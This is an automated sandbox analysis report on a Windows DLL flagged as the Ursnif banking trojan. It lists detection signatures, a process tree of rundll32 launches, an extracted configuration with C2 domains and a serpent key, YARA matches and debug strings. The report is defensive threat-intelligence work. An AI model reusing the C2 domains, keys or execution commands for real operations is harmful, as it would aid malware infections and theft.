Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 616412739e268.dll

Overview

General Information

Sample Name:616412739e268.dll
Analysis ID:500413
MD5:9e67e68ddbedba865b91b5469ab642ef
SHA1:f2c7b0735343081be06e48616d0fc14235a28744
SHA256:41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
Tags:brtdllgoziisfbursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7036 cmdline: loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 7040 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 7052 cmdline: rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7072 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6452 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 1364 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6824 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 644 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6464 cmdline: rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6368 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 632 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
            Click to see the 31 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.3.rundll32.exe.8aa31a.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.3.rundll32.exe.322a31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                5.3.rundll32.exe.2eca31a.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  5.3.rundll32.exe.2eca31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    3.3.rundll32.exe.342a31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 18 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 616412739e268.dllReversingLabs: Detection: 24%
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: areuranel.websiteVirustotal: Detection: 6%Perma Link
                      Source: breuranel.websiteVirustotal: Detection: 6%Perma Link
                      Source: 616412739e268.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.116.82:443 -> 192.168.2.4:49806 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.183.162:443 -> 192.168.2.4:49807 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.218.82:443 -> 192.168.2.4:49808 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.4:49809 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.218.66:443 -> 192.168.2.4:49810 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.137.210:443 -> 192.168.2.4:49811 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49827 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.4:49829 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.4:49860 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.207.194:443 -> 192.168.2.4:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.124.226:443 -> 192.168.2.4:49862 version: TLS 1.2
                      Source: 616412739e268.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.880000220.0000000004643000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891762437.00000000009A6000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbJv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901209747.0000000004CA3000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdbvv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.878970110.000000000067E000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.893625998.00000000009A0000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb: source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdbnv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901209747.0000000004CA3000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbE source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbO{ source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbQt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.879277222.000000000068A000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdbr source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdbLy source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbby source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbXv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbx source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbQ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb_ source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbet source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdbst source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.1186382182.000000006E34B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1187500512.000000006E34B000.00000002.00020000.sdmp, 616412739e268.dll
                      Source: Binary string: wsspicli.pdbWt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbw source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbCt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000009.00000003.879269729.0000000000684000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891762437.00000000009A6000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb]t source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbbv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbhv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000F.00000003.920780539.0000000005903000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdbpv source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbI source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbOt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: propsys.pdbIt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbkt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb|v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: imagehlp.pdb^v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdbEm5 source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920780539.0000000005903000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000009.00000003.878970110.000000000067E000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.893625998.00000000009A0000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.884376427.0000000004861000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.900811190.0000000004BA1000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.920644749.00000000057B1000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000009.00000003.884560858.00000000049C4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901119468.0000000004C94000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920715440.00000000058F2000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb&v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbyt source: WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb,v source: WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.884541519.00000000049C0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901100128.0000000004C90000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920860048.00000000058F0000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000009.00000003.879277222.000000000068A000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.891777281.00000000009AC000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdbC source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.884465681.00000000049C7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.901146465.0000000004C97000.00000004.00000040.sdmp, WerFault.exe, 0000000F.00000003.920913460.00000000058F7000.00000004.00000040.sdmp
